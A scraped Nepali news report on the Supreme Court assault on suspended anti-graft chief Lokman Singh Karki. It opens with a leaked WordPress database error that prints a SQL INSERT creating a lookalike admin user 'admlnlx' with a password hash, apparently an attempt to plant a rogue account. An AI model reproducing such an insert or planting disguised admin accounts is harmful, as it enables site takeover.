WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuEDqlormr0v51k4rCRbYMEbrH9Opi1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-13 08:26:45', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ७-
अख्तियार दुरुपयोग अनुसन्धान आयोगका निलम्बित प्रमुख लोकमान सिंह कार्कीमाथि सर्वोच्च अदालतभित्रै हातपात भएको छ । र, कालोमोसो समेत दलिएको छ ।
आफ्नो योग्यतासम्बन्धी मुद्दामा सर्वोच्चमा बिहीबारबाट सुरु भएको बहसमा पेशीका लागि अपराह्न अदालत पुगेका बेला कार्कीमाथि एक व्यक्तिले आक्रमण गरेका हुन् । उनको परिचय खुलाइएको छैन् ।
हातमा कालो मोसो लिएर पेशी लिने ठाउँमै पुगेर लोकमानलाई आक्रमण गर्न खोज्दा उनलाई प्रहरीले पक्राउ गरेको छ ।कार्कीमाथि हातपात गर्ने युवकले ‘नेकपा माओवादी जिन्दावाद’ भन्दै नारा लगाएका थिए ।